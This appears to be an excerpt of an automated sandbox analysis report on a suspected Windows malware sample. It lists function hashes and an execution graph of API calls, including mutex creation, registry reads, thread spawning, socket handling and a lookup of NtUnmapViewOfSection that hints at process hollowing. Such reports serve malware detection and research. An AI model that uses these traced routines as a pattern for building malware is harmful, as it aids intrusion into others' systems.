                                                                                          • Opcode ID: 244c614e04a80719a4cbb1e35d09afbc7f52f2045db6f081cea45e42cbbeead8
                                                                                          • Instruction ID: 5ee2816a71bbce3ef2d6bb0c716e0e344ead6cd1f0e49621e0804bf330546376
                                                                                          • Opcode Fuzzy Hash: 244c614e04a80719a4cbb1e35d09afbc7f52f2045db6f081cea45e42cbbeead8
                                                                                          • Instruction Fuzzy Hash: 7E11BB75904280DFCB16DF14C9C0B15BBA2FF84324F24C6AAD8494B696C33AD84ACB61
                                                                                          Function 00F7D759 Relevance: .0, Instructions: 45COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000009.00000002.1930649941.0000000000F7D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F7D000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_9_2_f7d000_myTuDsvNcebev.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 15df01d6f26856f6f7b793cac1e2e4ea0e94d7b9ad2f65ae8aaaf56d84c80cd8
                                                                                          • Instruction ID: 57e2e01e5e88475bbf6782093e3315c43bc7558f52e12e4c1eee08305a0fe225
                                                                                          • Opcode Fuzzy Hash: 15df01d6f26856f6f7b793cac1e2e4ea0e94d7b9ad2f65ae8aaaf56d84c80cd8
                                                                                          • Instruction Fuzzy Hash: 8801F7724053009AE7184A29CCC0B26BFB8DF51334F58C85BED0D4A282C7389841EA72
                                                                                          Function 00F7D758 Relevance: .0, Instructions: 36COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000009.00000002.1930649941.0000000000F7D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F7D000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_9_2_f7d000_myTuDsvNcebev.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 9c6a58c91d4e203e93d640360661c61702214948c92c1ae0ae9eb19e252ac4c7
                                                                                          • Instruction ID: 679313469f4eaf86bdbdaa691c830b7e3220a06e2cd4c058730033969bed9027
                                                                                          • Opcode Fuzzy Hash: 9c6a58c91d4e203e93d640360661c61702214948c92c1ae0ae9eb19e252ac4c7
                                                                                          • Instruction Fuzzy Hash: 45F062728053449EE7248A1ADDC4B62FFACEF51734F18C45BED4C4A286C379A845DAB1
                                                                                          Function 0A8E0E80 Relevance: .0, Instructions: 30COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000009.00000002.1938023408.000000000A8E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A8E0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_9_2_a8e0000_myTuDsvNcebev.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 4c0fa07c3777e36b5e9f6f10a5bb5adc05ee24060b8cd959817b7bd4f166e2fd
                                                                                          • Instruction ID: 0845b909c88c2217a578f7a776aebace8ee875f6cc5b84842919e4809c5a45b8
                                                                                          • Opcode Fuzzy Hash: 4c0fa07c3777e36b5e9f6f10a5bb5adc05ee24060b8cd959817b7bd4f166e2fd
                                                                                          • Instruction Fuzzy Hash: D5F0E57198E204EFCB02EBE0D9445A97BF4DB47210B1449E7D448CB151EAB28D049BA1
                                                                                          Function 0A8E0E90 Relevance: .0, Instructions: 20COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000009.00000002.1938023408.000000000A8E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A8E0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_9_2_a8e0000_myTuDsvNcebev.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 5fbf1cef9e1da910e737b765562f3cf3e7786a15172d8e2062241fd64f709e0f
                                                                                          • Instruction ID: 4da698fe1cf0e9c1c166a4b11b40f8e3e359988e0b5072d051d7d222b741a832
                                                                                          • Opcode Fuzzy Hash: 5fbf1cef9e1da910e737b765562f3cf3e7786a15172d8e2062241fd64f709e0f
                                                                                          • Instruction Fuzzy Hash: D8E0C27054A108EFCB00EBF4D4485DEBBF8DB0A200F0049A6D00593110FE718E00AB91

                                                                                          Execution Graph

                                                                                          Execution Coverage:1.8%
                                                                                          Dynamic/Decrypted Code Coverage:0%
                                                                                          Signature Coverage:3.6%
                                                                                          Total number of Nodes:632
                                                                                          Total number of Limit Nodes:17
                                                                                          execution_graph 45143 404e06 WaitForSingleObject 45144 404e20 SetEvent CloseHandle 45143->45144 45145 404e37 closesocket 45143->45145 45146 404eb8 45144->45146 45147 404e44 45145->45147 45148 404e5a 45147->45148 45156 4050c4 83 API calls 45147->45156 45150 404e6c WaitForSingleObject 45148->45150 45151 404eae SetEvent CloseHandle 45148->45151 45157 41c4c6 DeleteCriticalSection EnterCriticalSection LeaveCriticalSection 45150->45157 45151->45146 45153 404e7b SetEvent WaitForSingleObject 45158 41c4c6 DeleteCriticalSection EnterCriticalSection LeaveCriticalSection 45153->45158 45155 404e93 SetEvent CloseHandle CloseHandle 45155->45151 45156->45148 45157->45153 45158->45155 45159 4457a9 GetLastError 45160 4457c2 45159->45160 45161 4457c8 45159->45161 45185 445ceb 11 API calls 2 library calls 45160->45185 45164 44581f SetLastError 45161->45164 45178 443005 45161->45178 45168 445828 45164->45168 45165 4457e2 45186 443c92 20 API calls __dosmaperr 45165->45186 45169 4457f7 45169->45165 45172 4457fe 45169->45172 45171 4457e8 45173 445816 SetLastError 45171->45173 45188 445597 20 API calls __dosmaperr 45172->45188 45173->45168 45175 445809 45189 443c92 20 API calls __dosmaperr 45175->45189 45177 44580f 45177->45164 45177->45173 45183 443012 ___crtLCMapStringA 45178->45183 45179 443052 45191 43ad91 20 API calls __dosmaperr 45179->45191 45180 44303d RtlAllocateHeap 45181 443050 45180->45181 45180->45183 45181->45165 45187 445d41 11 API calls 2 library calls 45181->45187 45183->45179 45183->45180 45190 440480 7 API calls 2 library calls 45183->45190 45185->45161 45186->45171 45187->45169 45188->45175 45189->45177 45190->45183 45191->45181 45192 40163e 45193 401646 45192->45193 45194 401649 45192->45194 45195 401688 45194->45195 45197 401676 45194->45197 45200 43229f 45195->45200 45199 43229f new 22 API calls 45197->45199 45198 40167c 45199->45198 45202 4322a4 45200->45202 45203 4322d0 45202->45203 45207 439adb 45202->45207 45214 440480 7 API calls 2 library calls 45202->45214 45215 4329bd RaiseException Concurrency::cancel_current_task __CxxThrowException@8 45202->45215 45216 43301b RaiseException Concurrency::cancel_current_task __CxxThrowException@8 45202->45216 45203->45198 45212 443649 ___crtLCMapStringA 45207->45212 45208 443687 45218 43ad91 20 API calls __dosmaperr 45208->45218 45209 443672 RtlAllocateHeap 45211 443685 45209->45211 45209->45212 45211->45202 45212->45208 45212->45209 45217 440480 7 API calls 2 library calls 45212->45217 45214->45202 45217->45212 45218->45211 45219 43263c 45220 432648 ___DestructExceptionObject 45219->45220 45245 43234b 45220->45245 45222 43264f 45224 432678 45222->45224 45509 4327ae IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter ___scrt_fastfail 45222->45509 45232 4326b7 ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 45224->45232 45510 441763 5 API calls CatchGuardHandler 45224->45510 45226 432691 45228 432697 ___DestructExceptionObject 45226->45228 45511 441707 5 API calls CatchGuardHandler 45226->45511 45229 432717 45256 4328c9 45229->45256 45232->45229 45512 4408e7 35 API calls 5 library calls 45232->45512 45240 432743 45242 43274c 45240->45242 45513 4408c2 28 API calls _Atexit 45240->45513 45514 4324c2 13 API calls 2 library calls 45242->45514 45246 432354 45245->45246 45515 4329da IsProcessorFeaturePresent 45246->45515 45248 432360 45516 436cd1 10 API calls 4 library calls 45248->45516 45250 432365 45251 432369 45250->45251 45517 4415bf 45250->45517 45251->45222 45254 432380 45254->45222 45533 434c30 45256->45533 45259 43271d 45260 4416b4 45259->45260 45535 44c239 45260->45535 45262 432726 45265 40d3f0 45262->45265 45263 4416bd 45263->45262 45539 443d25 35 API calls 45263->45539 45541 41a8da LoadLibraryA GetProcAddress 45265->45541 45267 40d40c 45548 40dd83 45267->45548 45269 40d415 45563 4020d6 45269->45563 45272 4020d6 28 API calls 45273 40d433 45272->45273 45569 419d87 45273->45569 45277 40d445 45595 401e6d 45277->45595 45279 40d44e 45280 40d461 45279->45280 45281 40d4b8 45279->45281 45601 40e609 45280->45601 45283 401e45 22 API calls 45281->45283 45284 40d4c6 45283->45284 45288 401e45 22 API calls 45284->45288 45287 40d47f 45616 40f98d 45287->45616 45289 40d4e5 45288->45289 45632 4052fe 45289->45632 45292 40d4f4 45637 408209 45292->45637 45301 40d4a3 45303 401fb8 11 API calls 45301->45303 45305 40d4ac 45303->45305 45504 4407f6 GetModuleHandleW 45305->45504 45306 401fb8 11 API calls 45307 40d520 45306->45307 45308 401e45 22 API calls 45307->45308 45309 40d529 45308->45309 45654 401fa0 45309->45654 45311 40d534 45312 401e45 22 API calls 45311->45312 45313 40d54f 45312->45313 45314 401e45 22 API calls 45313->45314 45315 40d569 45314->45315 45316 40d5cf 45315->45316 45658 40822a 28 API calls 45315->45658 45317 401e45 22 API calls 45316->45317 45324 40d5dc 45317->45324 45319 40d594 45320 401fc2 28 API calls 45319->45320 45321 40d5a0 45320->45321 45322 401fb8 11 API calls 45321->45322 45325 40d5a9 45322->45325 45323 40d650 45327 40d660 CreateMutexA GetLastError 45323->45327 45324->45323 45326 401e45 22 API calls 45324->45326 45659 411f34 RegOpenKeyExA RegQueryValueExA RegCloseKey 45325->45659 45328 40d5f5 45326->45328 45329 40d987 45327->45329 45330 40d67f 45327->45330 45331 40d5fc OpenMutexA 45328->45331 45334 401fb8 11 API calls 45329->45334 45371 40d9ec 45329->45371 45332 40d688 45330->45332 45333 40d68a GetModuleFileNameW 45330->45333 45336 40d622 45331->45336 45337 40d60f WaitForSingleObject CloseHandle 45331->45337 45332->45333 45662 4192ae 33 API calls 45333->45662 45358 40d99a ___scrt_fastfail 45334->45358 45660 411f34 RegOpenKeyExA RegQueryValueExA RegCloseKey 45336->45660 45337->45336 45339 40d5c5 45339->45316 45341 40dd0f 45339->45341 45340 40d6a0 45343 40d6f5 45340->45343 45345 401e45 22 API calls 45340->45345 45692 41239a 30 API calls 45341->45692 45344 401e45 22 API calls 45343->45344 45353 40d720 45344->45353 45351 40d6bf 45345->45351 45347 40dd22 45693 410eda 65 API calls ___scrt_fastfail 45347->45693 45349 40dcfa 45380 40dd6a 45349->45380 45694 402073 28 API calls 45349->45694 45350 40d63b 45350->45323 45661 41239a 30 API calls 45350->45661 45351->45343 45359 40d6f7 45351->45359 45364 40d6db 45351->45364 45352 40d731 45357 401e45 22 API calls 45352->45357 45353->45352 45666 40e501 CreateProcessA CloseHandle CloseHandle ___scrt_fastfail 45353->45666 45367 40d73a 45357->45367 45674 4120e8 RegOpenKeyExA RegQueryValueExA RegCloseKey 45358->45674 45664 411eea RegOpenKeyExA RegQueryValueExA RegCloseKey 45359->45664 45360 40dd3a 45695 4052dd 28 API calls 45360->45695 45364->45343 45663 4067a0 36 API calls ___scrt_fastfail 45364->45663 45373 401e45 22 API calls 45367->45373 45370 40d70d 45370->45343 45665 4066a6 58 API calls 45370->45665 45374 401e45 22 API calls 45371->45374 45377 40d755 45373->45377 45378 40da10 45374->45378 45381 401e45 22 API calls 45377->45381 45675 402073 28 API calls 45378->45675 45696 413980 161 API calls 45380->45696 45383 40d76f 45381->45383 45387 401e45 22 API calls 45383->45387 45386 40da22 45676 41215f 14 API calls 45386->45676 45388 40d789 45387->45388 45393 401e45 22 API calls 45388->45393 45390 40da38 45391 401e45 22 API calls 45390->45391 45392 40da44 45391->45392 45677 439867 39 API calls _swprintf 45392->45677 45397 40d7a3 45393->45397 45395 40da51 45399 40da7e 45395->45399 45678 41aa4f 81 API calls ___scrt_fastfail 45395->45678 45396 40d810 45396->45358 45400 401e45 22 API calls 45396->45400 45434 40d89f ___scrt_fastfail 45396->45434 45397->45396 45398 401e45 22 API calls 45397->45398 45406 40d7b8 _wcslen 45398->45406 45679 402073 28 API calls 45399->45679 45403 40d831 45400->45403 45410 401e45 22 API calls 45403->45410 45404 40da70 CreateThread 45404->45399 45933 41b212 10 API calls 45404->45933 45405 40da8d 45680 402073 28 API calls 45405->45680 45406->45396 45412 401e45 22 API calls 45406->45412 45408 40da9c 45681 4194da 79 API calls 45408->45681 45413 40d843 45410->45413 45411 40daa1 45414 401e45 22 API calls 45411->45414 45415 40d7d3 45412->45415 45417 401e45 22 API calls 45413->45417 45416 40daad 45414->45416 45418 401e45 22 API calls 45415->45418 45420 401e45 22 API calls 45416->45420 45419 40d855 45417->45419 45421 40d7e8 45418->45421 45423 401e45 22 API calls 45419->45423 45422 40dabf 45420->45422 45667 40c5ed 31 API calls 45421->45667 45426 401e45 22 API calls 45422->45426 45424 40d87e 45423->45424 45431 401e45 22 API calls 45424->45431 45428 40dad5 45426->45428 45427 40d7fb 45668 401ef3 28 API calls 45427->45668 45435 401e45 22 API calls 45428->45435 45430 40d807 45669 401ee9 11 API calls 45430->45669 45433 40d88f 45431->45433 45670 40b871 46 API calls _wcslen 45433->45670 45671 412338 31 API calls 45434->45671 45436 40daf5 45435->45436 45682 439867 39 API calls _swprintf 45436->45682 45439 40d942 ctype 45443 401e45 22 API calls 45439->45443 45441 40db02 45442 401e45 22 API calls 45441->45442 45444 40db0d 45442->45444 45446 40d959 45443->45446 45445 401e45 22 API calls 45444->45445 45447 40db1e 45445->45447 45446->45371 45448 401e45 22 API calls 45446->45448 45683 408f1f 166 API calls _wcslen 45447->45683 45449 40d976 45448->45449 45672 419bca 28 API calls 45449->45672 45451 40d982 45673 40de34 88 API calls 45451->45673 45454 40db33 45455 401e45 22 API calls 45454->45455 45457 40db3c 45455->45457 45456 40db83 45459 401e45 22 API calls 45456->45459 45457->45456 45458 43229f new 22 API calls 45457->45458 45460 40db53 45458->45460 45464 40db91 45459->45464 45461 401e45 22 API calls 45460->45461 45462 40db65 45461->45462 45467 40db6c CreateThread 45462->45467 45463 40dbd9 45466 401e45 22 API calls 45463->45466 45464->45463 45465 43229f new 22 API calls 45464->45465 45468 40dba5 45465->45468 45472 40dbe2 45466->45472 45467->45456 45931 417f6a 100 API calls __EH_prolog 45467->45931 45469 401e45 22 API calls 45468->45469 45470 40dbb6 45469->45470 45473 40dbbd CreateThread 45470->45473 45471 40dc4c 45474 401e45 22 API calls 45471->45474 45472->45471 45475 401e45 22 API calls 45472->45475 45473->45463 45928 417f6a 100 API calls __EH_prolog 45473->45928 45478 40dc55 45474->45478 45476 40dbfc 45475->45476 45477 401e45 22 API calls 45476->45477 45481 40dc11 45477->45481 45479 40dc99 45478->45479 45480 401e45 22 API calls 45478->45480 45689 4195f8 79 API calls 45479->45689 45483 40dc69 45480->45483 45684 40c5a1 31 API calls 45481->45684 45489 401e45 22 API calls 45483->45489 45484 40dca2 45690 401ef3 28 API calls 45484->45690 45487 40dcad 45691 401ee9 11 API calls 45487->45691 45492 40dc7e 45489->45492 45490 40dc24 45685 401ef3 28 API calls 45490->45685 45491 40dcb6 CreateThread 45496 40dce5 45491->45496 45497 40dcd9 CreateThread 45491->45497 45929 40e18d 122 API calls 45491->45929 45687 439867 39 API calls _swprintf 45492->45687 45495 40dc30 45686 401ee9 11 API calls 45495->45686 45496->45349 45499 40dcee CreateThread 45496->45499 45497->45496 45930 410b5c 137 API calls 45497->45930 45499->45349 45932 411140 38 API calls ___scrt_fastfail 45499->45932 45501 40dc39 CreateThread 45501->45471 45934 401bc9 49 API calls 45501->45934 45502 40dc8b 45688 40b0a3 7 API calls 45502->45688 45505 432739 45504->45505 45505->45240 45506 44091f 45505->45506 45936 44069c 45506->45936 45509->45222 45510->45226 45511->45232 45512->45229 45513->45242 45514->45228 45515->45248 45516->45250 45521 44cd48 45517->45521 45520 436cfa 8 API calls 3 library calls 45520->45251 45524 44cd61 45521->45524 45523 432372 45523->45254 45523->45520 45525 432d4b 45524->45525 45526 432d56 IsProcessorFeaturePresent 45525->45526 45527 432d54 45525->45527 45529 432d98 45526->45529 45527->45523 45532 432d5c SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 45529->45532 45531 432e7b 45531->45523 45532->45531 45534 4328dc GetStartupInfoW 45533->45534 45534->45259 45536 44c24b 45535->45536 45537 44c242 45535->45537 45536->45263 45540 44c138 48 API calls 5 library calls 45537->45540 45539->45263 45540->45536 45542 41a919 LoadLibraryA GetProcAddress 45541->45542 45543 41a909 GetModuleHandleA GetProcAddress 45541->45543 45544 41a947 GetModuleHandleA GetProcAddress 45542->45544 45545 41a937 GetModuleHandleA GetProcAddress 45542->45545 45543->45542 45546 41a973 24 API calls 45544->45546 45547 41a95f GetModuleHandleA GetProcAddress 45544->45547 45545->45544 45546->45267 45547->45546 45697 419493 FindResourceA 45548->45697 45551 439adb _Yarn 21 API calls 45552 40ddad _Yarn 45551->45552 45700 402097 45552->45700 45555 401fc2 28 API calls 45556 40ddd3 45555->45556 45557 401fb8 11 API calls 45556->45557 45558 40dddc 45557->45558 45559 439adb _Yarn 21 API calls 45558->45559 45560 40dded _Yarn 45559->45560 45706 4062ee 45560->45706 45562 40de20 45562->45269 45564 4020ec 45563->45564 45565 4023ae 11 API calls 45564->45565 45566 402106 45565->45566 45567 402549 28 API calls 45566->45567 45568 402114 45567->45568 45568->45272 45758 4020bf 45569->45758 45571 401fb8 11 API calls 45572 419e3c 45571->45572 45573 401fb8 11 API calls 45572->45573 45575 419e44 45573->45575 45574 419e0c 45764 404182 28 API calls 45574->45764 45578 401fb8 11 API calls 45575->45578 45580 40d43c 45578->45580 45579 419e18 45581 401fc2 28 API calls 45579->45581 45591 40e563 45580->45591 45583 419e21 45581->45583 45582 401fc2 28 API calls 45584 419d9a 45582->45584 45586 401fb8 11 API calls 45583->45586 45584->45574 45584->45582 45585 401fb8 11 API calls 45584->45585 45590 419e0a 45584->45590 45762 404182 28 API calls 45584->45762 45763 41ab9a 28 API calls 45584->45763 45585->45584 45587 419e29 45586->45587 45765 41ab9a 28 API calls 45587->45765 45590->45571 45592 40e56f 45591->45592 45594 40e576 45591->45594 45766 402143 11 API calls 45592->45766 45594->45277 45596 402143 45595->45596 45600 40217f 45596->45600 45767 402710 11 API calls 45596->45767 45598 402164 45768 4026f2 11 API calls std::_Deallocate 45598->45768 45600->45279 45602 40e624 45601->45602 45769 40f57c 45602->45769 45608 40e663 45609 40d473 45608->45609 45785 40f663 45608->45785 45611 401e45 45609->45611 45613 401e4d 45611->45613 45612 401e55 45612->45287 45613->45612 45880 402138 22 API calls 45613->45880 45618 40f997 __EH_prolog 45616->45618 45881 40fcfb 45618->45881 45619 40f663 36 API calls 45620 40fb90 45619->45620 45885 40fce0 45620->45885 45622 40d491 45624 40e5ba 45622->45624 45623 40fa1a 45623->45619 45891 40f4c6 45624->45891 45627 40d49a 45629 40dd70 45627->45629 45628 40f663 36 API calls 45628->45627 45901 40e5da 70 API calls 45629->45901 45631 40dd7b 45633 4020bf 11 API calls 45632->45633 45634 40530a 45633->45634 45902 403280 45634->45902 45636 405326 45636->45292 45906 4051cf 45637->45906 45639 408217 45910 402035 45639->45910 45642 401fc2 45643 401fd1 45642->45643 45650 402019 45642->45650 45644 4023ae 11 API calls 45643->45644 45645 401fda 45644->45645 45646 40201c 45645->45646 45647 401ff5 45645->45647 45648 40265a 11 API calls 45646->45648 45925 403078 28 API calls 45647->45925 45648->45650 45651 401fb8 45650->45651 45652 4023ae 11 API calls 45651->45652 45653 401fc1 45652->45653 45653->45306 45655 401fb2 45654->45655 45656 401fa9 45654->45656 45655->45311 45926 4025c0 28 API calls 45656->45926 45658->45319 45659->45339 45660->45350 45661->45323 45662->45340 45663->45343 45664->45370 45665->45343 45666->45352 45667->45427 45668->45430 45669->45396 45670->45434 45671->45439 45672->45451 45673->45329 45674->45371 45675->45386 45676->45390 45677->45395 45678->45404 45679->45405 45680->45408 45681->45411 45682->45441 45683->45454 45684->45490 45685->45495 45686->45501 45687->45502 45688->45479 45689->45484 45690->45487 45691->45491 45692->45347 45694->45360 45927 418ccd 104 API calls 45696->45927 45698 4194b0 LoadResource LockResource SizeofResource 45697->45698 45699 40dd9e 45697->45699 45698->45699 45699->45551 45701 40209f 45700->45701 45709 4023ae 45701->45709 45703 4020aa 45713 4024ea 45703->45713 45705 4020b9 45705->45555 45707 402097 28 API calls 45706->45707 45708 406302 45707->45708 45708->45562 45710 402408 45709->45710 45711 4023b8 45709->45711 45710->45703 45711->45710 45720 402787 11 API calls std::_Deallocate 45711->45720 45714 4024fa 45713->45714 45715 402500 45714->45715 45716 402515 45714->45716 45721 402549 45715->45721 45731 4028c8 45716->45731 45719 402513 45719->45705 45720->45710 45742 402868 45721->45742 45723 40255d 45724 402572 45723->45724 45725 402587 45723->45725 45747 402a14 22 API calls 45724->45747 45727 4028c8 28 API calls 45725->45727 45730 402585 45727->45730 45728 40257b 45748 4029ba 22 API calls 45728->45748 45730->45719 45732 4028d1 45731->45732 45733 402933 45732->45733 45734 4028db 45732->45734 45756 402884 22 API calls 45733->45756 45737 4028e4 45734->45737 45738 4028f7 45734->45738 45750 402c8e 45737->45750 45740 4028f5 45738->45740 45741 4023ae 11 API calls 45738->45741 45740->45719 45741->45740 45743 402870 45742->45743 45744 402878 45743->45744 45749 402c83 22 API calls 45743->45749 45744->45723 45747->45728 45748->45730 45751 402c98 __EH_prolog 45750->45751 45757 402e34 22 API calls 45751->45757 45753 4023ae 11 API calls 45755 402d72 45753->45755 45754 402d04 45754->45753 45755->45740 45757->45754 45759 4020c7 45758->45759 45760 4023ae 11 API calls 45759->45760 45761 4020d2 45760->45761 45761->45584 45762->45584 45763->45584 45764->45579 45765->45590 45766->45594 45767->45598 45768->45600 45789 40f821 45769->45789 45772 40f55d 45867 40f7fb 45772->45867 45774 40f565 45872 40f44c 45774->45872 45776 40e651 45777 40f502 45776->45777 45778 40f510 45777->45778 45784 40f53f std::ios_base::_Ios_base_dtor 45777->45784 45877 4335cb 65 API calls 45778->45877 45780 40f51d 45781 40f44c 20 API calls 45780->45781 45780->45784 45782 40f52e 45781->45782 45878 40fbc8 56 API calls 6 library calls 45782->45878 45784->45608 45786 40f66b 45785->45786 45787 40f67e 45785->45787 45879 40f854 36 API calls 45786->45879 45787->45609 45796 40d2ce 45789->45796 45793 40f83c 45794 40e631 45793->45794 45795 40f663 36 API calls 45793->45795 45794->45772 45795->45794 45797 40d2ff 45796->45797 45798 43229f new 22 API calls 45797->45798 45799 40d306 45798->45799 45806 40cb7a 45799->45806 45802 40f887 45803 40f896 45802->45803 45841 40f8b7 45803->45841 45805 40f89c std::ios_base::_Ios_base_dtor 45805->45793 45809 4332ea 45806->45809 45808 40cb84 45808->45802 45810 4332f6 __EH_prolog3 45809->45810 45821 4330a5 45810->45821 45815 433314 45835 43347f 37 API calls _Atexit 45815->45835 45816 433370 std::locale::_Init 45816->45808 45818 43331c 45836 433240 21 API calls _Yarn 45818->45836 45820 433332 45827 4330fd 45820->45827 45822 4330b4 45821->45822 45824 4330bb 45821->45824 45837 442df9 EnterCriticalSection _Atexit 45822->45837 45825 4330b9 45824->45825 45838 43393c EnterCriticalSection 45824->45838 45825->45820 45834 43345a 22 API calls 2 library calls 45825->45834 45828 433107 45827->45828 45829 442e02 45827->45829 45830 43311a 45828->45830 45839 43394a LeaveCriticalSection 45828->45839 45840 442de2 LeaveCriticalSection 45829->45840 45830->45816 45833 442e09 45833->45816 45834->45815 45835->45818 45836->45820 45837->45825 45838->45825 45839->45830 45840->45833 45842 4330a5 std::_Lockit::_Lockit 2 API calls 45841->45842 45843 40f8c9 45842->45843 45862 40cae9 4 API calls 2 library calls 45843->45862 45845 40f8dc 45846 40f8ef 45845->45846 45863 40ccd4 56 API calls new 45845->45863 45847 4330fd std::_Lockit::~_Lockit 2 API calls 45846->45847 45848 40f925 45847->45848 45848->45805 45850 40f8ff 45851 40f906 45850->45851 45852 40f92d 45850->45852 45864 4332b6 22 API calls new 45851->45864 45865 436ec6 RaiseException 45852->45865 45855 40f943 45856 40f984 45855->45856 45866 43219b EnterCriticalSection LeaveCriticalSection WaitForSingleObjectEx __Init_thread_wait __Init_thread_footer 45855->45866 45856->45805 45862->45845 45863->45850 45864->45846 45865->45855 45868 43229f new 22 API calls 45867->45868 45869 40f80b 45868->45869 45870 40cb7a 41 API calls 45869->45870 45871 40f813 45870->45871 45871->45774 45873 40f469 45872->45873 45875 40f48b 45873->45875 45876 43aa1a 20 API calls 2 library calls 45873->45876 45875->45776 45876->45875 45877->45780 45878->45784 45879->45787 45883 40fd0e 45881->45883 45882 40fd3c 45882->45623 45883->45882 45889 40fe14 36 API calls 45883->45889 45886 40fce8 45885->45886 45888 40fcf3 45886->45888 45890 40fe79 36 API calls __EH_prolog 45886->45890 45888->45622 45889->45882 45890->45888 45892 40f4d0 45891->45892 45893 40f4d4 45891->45893 45896 40f44c 20 API calls 45892->45896 45899 40f30b 67 API calls 45893->45899 45895 40f4d9 45900 43a716 64 API calls 3 library calls 45895->45900 45898 40e5c5 45896->45898 45898->45627 45898->45628 45899->45895 45900->45892 45901->45631 45904 40328a 45902->45904 45903 4032a9 45903->45636 45904->45903 45905 4028c8 28 API calls 45904->45905 45905->45903 45907 4051db 45906->45907 45916 405254 45907->45916 45909 4051e8 45909->45639 45911 402041 45910->45911 45912 4023ae 11 API calls 45911->45912 45913 40205b 45912->45913 45921 40265a 45913->45921 45917 405262 45916->45917 45920 402884 22 API calls 45917->45920 45922 40266b 45921->45922 45923 4023ae 11 API calls 45922->45923 45924 40206d 45923->45924 45924->45642 45925->45650 45926->45655 45935 411253 61 API calls 45930->45935 45937 4406a8 _Atexit 45936->45937 45938 4406c0 45937->45938 45939 4407f6 _Atexit GetModuleHandleW 45937->45939 45958 442d9a EnterCriticalSection 45938->45958 45941 4406b4 45939->45941 45941->45938 45970 44083a GetModuleHandleExW 45941->45970 45942 440766 45959 4407a6 45942->45959 45945 4406c8 45945->45942 45947 44073d 45945->45947 45978 441450 20 API calls _Atexit 45945->45978 45950 440755 45947->45950 45979 441707 5 API calls CatchGuardHandler 45947->45979 45948 440783 45962 4407b5 45948->45962 45949 4407af 45981 454909 5 API calls CatchGuardHandler 45949->45981 45980 441707 5 API calls CatchGuardHandler 45950->45980 45958->45945 45982 442de2 LeaveCriticalSection 45959->45982 45961 44077f 45961->45948 45961->45949 45983 4461f8 45962->45983 45965 4407e3 45968 44083a _Atexit 8 API calls 45965->45968 45966 4407c3 GetPEB 45966->45965 45967 4407d3 GetCurrentProcess TerminateProcess 45966->45967 45967->45965 45969 4407eb ExitProcess 45968->45969 45971 440864 GetProcAddress 45970->45971 45972 440887 45970->45972 45973 440879 45971->45973 45974 440896 45972->45974 45975 44088d FreeLibrary 45972->45975 45973->45972 45976 432d4b CatchGuardHandler 5 API calls 45974->45976 45975->45974 45977 4408a0 45976->45977 45977->45938 45978->45947 45979->45950 45980->45942 45982->45961 45984 44621d 45983->45984 45986 446213 45983->45986 45989 4459f9 45984->45989 45987 432d4b CatchGuardHandler 5 API calls 45986->45987 45988 4407bf 45987->45988 45988->45965 45988->45966 45990 445a29 45989->45990 45994 445a25 45989->45994 45990->45986 45991 445a49 45991->45990 45993 445a55 GetProcAddress 45991->45993 45995 445a65 __crt_fast_encode_pointer 45993->45995 45994->45990 45994->45991 45996 445a95 45994->45996 45995->45990 45997 445ab6 LoadLibraryExW 45996->45997 45998 445aab 45996->45998 45999 445ad3 GetLastError 45997->45999 46000 445aeb 45997->46000 45998->45994 45999->46000 46001 445ade LoadLibraryExW 45999->46001 46000->45998 46002 445b02 FreeLibrary 46000->46002 46001->46000 46002->45998

                                                                                          Executed Functions

                                                                                          Function 0041A8DA Relevance: 105.1, APIs: 36, Strings: 24, Instructions: 130libraryloaderCOMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          APIs
                                                                                          • LoadLibraryA.KERNELBASE(Psapi.dll,GetModuleFileNameExA,?,?,?,?,0040D40C), ref: 0041A8EF
                                                                                          • GetProcAddress.KERNEL32(00000000), ref: 0041A8F8
                                                                                          • GetModuleHandleA.KERNEL32(Kernel32.dll,GetModuleFileNameExA,?,?,?,?,0040D40C), ref: 0041A90F
                                                                                          • GetProcAddress.KERNEL32(00000000), ref: 0041A912
                                                                                          • LoadLibraryA.KERNEL32(Psapi.dll,GetModuleFileNameExW,?,?,?,?,0040D40C), ref: 0041A924
                                                                                          • GetProcAddress.KERNEL32(00000000), ref: 0041A927
                                                                                          • GetModuleHandleA.KERNEL32(Kernel32.dll,GetModuleFileNameExW,?,?,?,?,0040D40C), ref: 0041A93D
                                                                                          • GetProcAddress.KERNEL32(00000000), ref: 0041A940
                                                                                          • GetModuleHandleA.KERNEL32(shcore,SetProcessDpiAwareness,?,?,?,?,0040D40C), ref: 0041A951
                                                                                          • GetProcAddress.KERNEL32(00000000), ref: 0041A954
                                                                                          • GetModuleHandleA.KERNEL32(user32,SetProcessDpiAware,?,?,?,?,0040D40C), ref: 0041A969
                                                                                          • GetProcAddress.KERNEL32(00000000), ref: 0041A96C
                                                                                          • LoadLibraryA.KERNEL32(ntdll.dll,NtUnmapViewOfSection,?,?,?,?,0040D40C), ref: 0041A97D
